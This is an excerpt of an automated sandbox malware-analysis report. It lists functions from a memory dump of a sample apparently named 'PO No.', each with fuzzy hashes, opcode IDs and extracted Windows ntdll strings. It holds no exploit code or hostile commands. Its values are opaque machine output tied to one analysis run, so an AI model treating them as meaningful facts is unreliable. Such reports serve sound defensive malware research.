                                                            • Opcode ID: bc8682bdaa50befcc3ab4dae458c78af7818b3ca40ca90c6c1780a2b741d5200
                                                            • Instruction ID: 00fc34e1f140cdde1df6281460393166cd92cd277c250a5f018c42dee829b103
                                                            • Opcode Fuzzy Hash: bc8682bdaa50befcc3ab4dae458c78af7818b3ca40ca90c6c1780a2b741d5200
                                                            • Instruction Fuzzy Hash: 0390023124144412D24171598404606000997D0781F95C033A0464554F8A598B57BA62
                                                            Function 00FD2D30 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2418789448.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f60000_PO No.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: e89ab20348f78b14fedb2339d193d7c080b0bb98f3edd9d91ef90bcbf93adc50
                                                            • Instruction ID: fd36c4e91f639fe2b9f5bf7c9967b4f8888b7750394cfb84da30d60e2e3a616d
                                                            • Opcode Fuzzy Hash: e89ab20348f78b14fedb2339d193d7c080b0bb98f3edd9d91ef90bcbf93adc50
                                                            • Instruction Fuzzy Hash: 9190022130144013D240715994186064005D7E1741F55D032E0454554DDD1989576223
                                                            Function 00FD2D10 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2418789448.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f60000_PO No.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 40048222f4250ce1efd1f4c24ae3feb2d89a2580b2ff0511ff3eb4dc47548a67
                                                            • Instruction ID: e8b00b20b8794699c41f5b52b2ce6bef3919bd738209f1515ffd56427f238fe3
                                                            • Opcode Fuzzy Hash: 40048222f4250ce1efd1f4c24ae3feb2d89a2580b2ff0511ff3eb4dc47548a67
                                                            • Instruction Fuzzy Hash: 9A90022921344012D2807159940860A000587D1742F95D436A0055558DCD19896A6322
                                                            Function 00FD2D00 Relevance: .0, Instructions: 4COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2418789448.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f60000_PO No.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 7316a63cbff6afdc3ddc7d245bca9dc8554e37474e204a9e561a684320c505cb
                                                            • Instruction ID: e507dbd778da18261279149e4db5432f321b04bf526457799f22c083258455ba
                                                            • Opcode Fuzzy Hash: 7316a63cbff6afdc3ddc7d245bca9dc8554e37474e204a9e561a684320c505cb
                                                            • Instruction Fuzzy Hash: 4C90022120548452D20075599408A06000587D0745F55D032A10A4595ECA398952B132
                                                            Function 00FD2EE0 Relevance: .0, Instructions: 4COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2418789448.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f60000_PO No.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 914e5b7a333538a52bb08dff42589d3cd118b2d0f221a4c8abd0da68a88f3b3d
                                                            • Instruction ID: a116a41a511060a517074c98469894a2202ceefdf524e807bab46d252d48d5b3
                                                            • Opcode Fuzzy Hash: 914e5b7a333538a52bb08dff42589d3cd118b2d0f221a4c8abd0da68a88f3b3d
                                                            • Instruction Fuzzy Hash: 4E90026120184413D24075598804607000587D0742F55C032A20A4555F8E2D8D527136
                                                            Function 00FD2EA0 Relevance: .0, Instructions: 4COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2418789448.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f60000_PO No.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 83556623b239429a598748a5a50a8aeb3a27cbe155c0f9c91f9a23452834224f
                                                            • Instruction ID: c4b487590700dc1c4ac6f6ec7bf1fe8e8b0443fbdcae13f08793490d9acb3927
                                                            • Opcode Fuzzy Hash: 83556623b239429a598748a5a50a8aeb3a27cbe155c0f9c91f9a23452834224f
                                                            • Instruction Fuzzy Hash: 5090027120144412D24071598404746000587D0741F55C032A50A4554F8A5D8ED67666
                                                            Function 00FD2E80 Relevance: .0, Instructions: 4COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2418789448.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f60000_PO No.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 5d5980f808370f6d9f3854a5044bf50767db468271c18f6d1acd9e80b0b3537b
                                                            • Instruction ID: 9839342db0711ae3d2337db593d0c2bc797cb695b77992694761594098713c97
                                                            • Opcode Fuzzy Hash: 5d5980f808370f6d9f3854a5044bf50767db468271c18f6d1acd9e80b0b3537b
                                                            • Instruction Fuzzy Hash: 0890022160144512D20171598404616000A87D0781F95C033A1064555FCE298A93B132
                                                            Function 00FD2E30 Relevance: .0, Instructions: 4COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2418789448.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f60000_PO No.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 6405716764a75bfc4f2963634262a41d0715daa21caf07517069f8e87abac96b
                                                            • Instruction ID: a68e3e6c6f3ce08d4947ada9d385ccd3acbe46862c9afbd659b2d0011cd93607
                                                            • Opcode Fuzzy Hash: 6405716764a75bfc4f2963634262a41d0715daa21caf07517069f8e87abac96b
                                                            • Instruction Fuzzy Hash: C690022130144412D202715984146060009C7D1785F95C033E1464555E8A298A53B133
                                                            Function 00FD2FE0 Relevance: .0, Instructions: 4COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2418789448.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f60000_PO No.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: ca3325fb8d8becbafddecef820879e0b258a51b21988583c4730d36462621490
                                                            • Instruction ID: 10bf07be44dda5e8d3541f22782f88bfce8c76212549297e58aca9c72c9f889a
                                                            • Opcode Fuzzy Hash: ca3325fb8d8becbafddecef820879e0b258a51b21988583c4730d36462621490
                                                            • Instruction Fuzzy Hash: 6F900221211C4052D30075698C14B07000587D0743F55C136A0194554DCD1989626522
                                                            Function 00FD2FB0 Relevance: .0, Instructions: 4COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2418789448.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f60000_PO No.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: c09f45751c7d32fb230b149c1aca73d1785f1760d42edf40151cc1948601a621
                                                            • Instruction ID: 826fa0047d750c5fd875652a117d6b05f62e7e1d071518e3e3faecd4d23e74fc
                                                            • Opcode Fuzzy Hash: c09f45751c7d32fb230b149c1aca73d1785f1760d42edf40151cc1948601a621
                                                            • Instruction Fuzzy Hash: 019002216014405242407169C8449064005ABE1751755C132A09D8550E895D89666666
                                                            Function 00FD2FA0 Relevance: .0, Instructions: 4COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2418789448.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f60000_PO No.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: e0d5ca8d0e9c77e7ede080c2e45795441010e32ab4e024d49b4153a8c591623d
                                                            • Instruction ID: 18a94a0d51072b004df766bfceb419d4a87f37cd9adbfe89016d99207a9c840e
                                                            • Opcode Fuzzy Hash: e0d5ca8d0e9c77e7ede080c2e45795441010e32ab4e024d49b4153a8c591623d
                                                            • Instruction Fuzzy Hash: 8390023120184412D20071598808747000587D0742F55C032A51A4555F8A69C9927532
                                                            Function 00FD2F90 Relevance: .0, Instructions: 4COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2418789448.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f60000_PO No.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 712b7a4cc21204b0d4cbff6977719564735d0619eeab6afac3da530faad4851c
                                                            • Instruction ID: f8d06ad7b3e6c62b3653a83ece14d06643fa7b14627e8a5424e5e2f2847c4607
                                                            • Opcode Fuzzy Hash: 712b7a4cc21204b0d4cbff6977719564735d0619eeab6afac3da530faad4851c
                                                            • Instruction Fuzzy Hash: 9790023120184412D2007159881470B000587D0742F55C032A11A4555E8A2989527572
                                                            Function 00FD2F60 Relevance: .0, Instructions: 4COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2418789448.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f60000_PO No.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: ad3ffd366faa1a35fb7f5767a2a1757b7db772c594069d747d96aa3d4fb23ee7
                                                            • Instruction ID: b518d914a01e14d49201ae1e12ab681362f43198cf5739b6277bb01fdd409b89
                                                            • Opcode Fuzzy Hash: ad3ffd366faa1a35fb7f5767a2a1757b7db772c594069d747d96aa3d4fb23ee7
                                                            • Instruction Fuzzy Hash: B390026121144052D20471598404706004587E1741F55C033A2194554DC92D8D626126
                                                            Function 00FD2F30 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2418789448.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f60000_PO No.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: bb1aba4201b97c64a5353d00da11c6f30bf0d8713178225c29767777e632065f
                                                            • Instruction ID: 4a401b40222a8cb397117b08120839f5f28f2fb68f1ad3624ddc69a9aa8817dc
                                                            • Opcode Fuzzy Hash: bb1aba4201b97c64a5353d00da11c6f30bf0d8713178225c29767777e632065f
                                                            • Instruction Fuzzy Hash: 9A90026134144452D20071598414B060005C7E1741F55C036E10A4554E8A1DCD537127
                                                            Function 00FD3090 Relevance: .0, Instructions: 4COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2418789448.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f60000_PO No.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 33db5965f78bfe2e3492687791ac11e62960f2572c1f138c4a16729775068574
                                                            • Instruction ID: 3cf55d9ddbd939e2a3e050330a727fab40515a1ca1d5972562633bb2b1834674
                                                            • Opcode Fuzzy Hash: 33db5965f78bfe2e3492687791ac11e62960f2572c1f138c4a16729775068574
                                                            • Instruction Fuzzy Hash: FE90022124144812D2407159C4147070006C7D0B41F55C032A0064554E8A1A8A6676B2
                                                            Function 00FD3010 Relevance: .0, Instructions: 4COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2418789448.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f60000_PO No.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: cf9a68cdf99c1bf19d97d20546a6666d1a954fffc655ef3175b44c291e3e1b3e
                                                            • Instruction ID: 1cec060edafa8303c2ce67d5f90f980be6df5846b4f63c24c08ebba9a7e883a9
                                                            • Opcode Fuzzy Hash: cf9a68cdf99c1bf19d97d20546a6666d1a954fffc655ef3175b44c291e3e1b3e
                                                            • Instruction Fuzzy Hash: BB90022120188452D24072598804B0F410587E1742F95C03AA4196554DCD1989566722
                                                            Function 00FD39B0 Relevance: .0, Instructions: 4COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2418789448.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f60000_PO No.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: a9ad8ba62cd152e5f38acd860716217b22b649eaea211e8b5fa7f71b22244173
                                                            • Instruction ID: 11c18c6cb1bafa70c73bf21c3eb296ff7658d41f845bed878c1542310f82916c
                                                            • Opcode Fuzzy Hash: a9ad8ba62cd152e5f38acd860716217b22b649eaea211e8b5fa7f71b22244173
                                                            • Instruction Fuzzy Hash: 9090022124549112D250715D84046164005A7E0741F55C032A0854594E895989567222
                                                            Function 00FD2C00 Relevance: .0, Instructions: 2COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2418789448.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f60000_PO No.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                            • Instruction ID: 46f3d5e1e08c1fe94718af74812445e3bdabf2b5f63842a69b7032363e720002
                                                            • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                            • Instruction Fuzzy Hash:
                                                            Function 00FD2890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2418789448.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f60000_PO No.jbxd
                                                            Similarity
                                                            • API ID: ___swprintf_l
                                                            • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                            • API String ID: 48624451-2108815105
                                                            • Opcode ID: c7db5358ecc2dc51fff9bc9cb5a829b39f61e3c90ad9b4579aeacee396ac6e74
                                                            • Instruction ID: 95f2491547385ac238d578517c86b7712d51ff16b747792211030c427b6ae5b0
                                                            • Opcode Fuzzy Hash: c7db5358ecc2dc51fff9bc9cb5a829b39f61e3c90ad9b4579aeacee396ac6e74
                                                            • Instruction Fuzzy Hash: C85127B2E04216BFDB61DB98C89097EF7B9BB18300B14826AE495D3381D734DE40B7E1
                                                            Function 01042410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2418789448.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f60000_PO No.jbxd
                                                            Similarity
                                                            • API ID: ___swprintf_l
                                                            • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                            • API String ID: 48624451-2108815105
                                                            • Opcode ID: 9bd67a279ba38630814d03e81cbc05ec09a846a4499d814d58bec043f3fc2335
                                                            • Instruction ID: 1238b3d0e57a0b1036051833e31c8c37207b752d7008bb149943240196151eaf
                                                            • Opcode Fuzzy Hash: 9bd67a279ba38630814d03e81cbc05ec09a846a4499d814d58bec043f3fc2335
                                                            • Instruction Fuzzy Hash: 9451F6B5B00645AFCB60DE9CD8D097EB7F8EF44200B4484A9F4D6D7642DAB4DA4087A0
                                                            Function 00FC7630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 01004655
                                                            • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 01004742
                                                            • Execute=1, xrefs: 01004713
                                                            • ExecuteOptions, xrefs: 010046A0
                                                            • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 010046FC
                                                            • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 01004725
                                                            • CLIENT(ntdll): Processing section info %ws..., xrefs: 01004787
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2418789448.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f60000_PO No.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                            • API String ID: 0-484625025
                                                            • Opcode ID: 7af579516d627b19c38d1140967e63c5ca9f4165a73cdd3837cc3506e16f28c0
                                                            • Instruction ID: 6b561a8eff516141215b1b992d8f0ce44d2e5b7ba18ef120711d6da4340ac50a
                                                            • Opcode Fuzzy Hash: 7af579516d627b19c38d1140967e63c5ca9f4165a73cdd3837cc3506e16f28c0
                                                            • Instruction Fuzzy Hash: F1514931A0431A6AEF21BAA4DD87FED77A8FF04310F14009DE609A71C1E7759E45AF51
                                                            Function 00FDB5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2418789448.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f60000_PO No.jbxd
                                                            Similarity
                                                            • API ID: __aulldvrm
                                                            • String ID: +$-$0$0
                                                            • API String ID: 1302938615-699404926
                                                            • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                            • Instruction ID: fb7fca438397dbaad376aef8f667f9a83dab5c3057d83f4734f495bedd64fd0c
                                                            • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                            • Instruction Fuzzy Hash: E581CE31E05249DBDF249F68C8917FEBBA7AF85360F1E425BE861A7391C7348841EB50
                                                            Function 010420E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2418789448.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f60000_PO No.jbxd
                                                            Similarity
                                                            • API ID: ___swprintf_l
                                                            • String ID: %%%u$[$]:%u
                                                            • API String ID: 48624451-2819853543
                                                            • Opcode ID: 8fa22363f2c11456529abdd32a5387d112bcdfee7b415a2aa07f8b5fe4ad5408
                                                            • Instruction ID: 52b2ce043642e3448ffd717c9635a9494e64d709d43d81881752e7c56a549b2e
                                                            • Opcode Fuzzy Hash: 8fa22363f2c11456529abdd32a5387d112bcdfee7b415a2aa07f8b5fe4ad5408
                                                            • Instruction Fuzzy Hash: A521A6BAA00119ABDB10DF69DC91AEEBBE8AF54740F040166F944D3201EB30DA01D7A1
                                                            Function 00FBF5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 010002BD
                                                            • RTL: Re-Waiting, xrefs: 0100031E
                                                            • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 010002E7
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2418789448.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f60000_PO No.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                            • API String ID: 0-2474120054
                                                            • Opcode ID: ad9fcd4f2c4f2ba2a05945554092e599a1ef5964ac2b40f617d001d28d26b559
                                                            • Instruction ID: a0686b0f0295d9e0f3902db412c8b0dc688c1dbf191d47d29243c32f552cf6fe
                                                            • Opcode Fuzzy Hash: ad9fcd4f2c4f2ba2a05945554092e599a1ef5964ac2b40f617d001d28d26b559
                                                            • Instruction Fuzzy Hash: 3FE1F2316087419FE722CF29CC84B9AB7E1BF84364F244A6DF5A58B2D1D774D848DB42
                                                            Function 00FCB4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0100728C
                                                            Strings
                                                            • RTL: Re-Waiting, xrefs: 010072C1
                                                            • RTL: Resource at %p, xrefs: 010072A3
                                                            • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 01007294
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2418789448.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f60000_PO No.jbxd
                                                            Similarity
                                                            • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                            • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                            • API String ID: 885266447-605551621
                                                            • Opcode ID: 9d0ba78bd98425936fb2faf8b0e587be6eac0ce528b497a75effe8e5da0c567c
                                                            • Instruction ID: 99262aa43bc31bfae7c68b4f20eec6bceacfb4642585526608bc127cb133a191
                                                            • Opcode Fuzzy Hash: 9d0ba78bd98425936fb2faf8b0e587be6eac0ce528b497a75effe8e5da0c567c
                                                            • Instruction Fuzzy Hash: 63412036704207ABD721DE24CC42FAAB7A5FB54710F100619F9C9AB281DB39F8029BD1
                                                            Function 01042300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2418789448.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f60000_PO No.jbxd
                                                            Similarity
                                                            • API ID: ___swprintf_l
                                                            • String ID: %%%u$]:%u
                                                            • API String ID: 48624451-3050659472
                                                            • Opcode ID: 841f2951779ca65dd4a0733e8da54c105f2dce6ddb0483a24f421a6047a981b6
                                                            • Instruction ID: d471fd314324be9d19b35db5a02c20ffd5fd43015884da4f72095c2b6b3c04d6
                                                            • Opcode Fuzzy Hash: 841f2951779ca65dd4a0733e8da54c105f2dce6ddb0483a24f421a6047a981b6
                                                            • Instruction Fuzzy Hash: CE318772A002199FDB60DF29DC80BEE77F8EB44611F4545A6F989D3241EB30AA449F60
                                                            Function 00F99126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2418789448.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f60000_PO No.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: $$@
                                                            • API String ID: 0-1194432280
                                                            • Opcode ID: f1cb6acf18d18e433d2710bfed061643ee530ca6a22182eb4ec27d4e5bd5461e
                                                            • Instruction ID: 6b2d9cd1cb083571a1dda2fbc043fdb54b1fb6163edc31767cf78c6a0c0edea6
                                                            • Opcode Fuzzy Hash: f1cb6acf18d18e433d2710bfed061643ee530ca6a22182eb4ec27d4e5bd5461e
                                                            • Instruction Fuzzy Hash: 7B813A72D042699BDB31CF54CC45BEEB7B8AF48710F0541EAAA09B7290D7749E84DFA0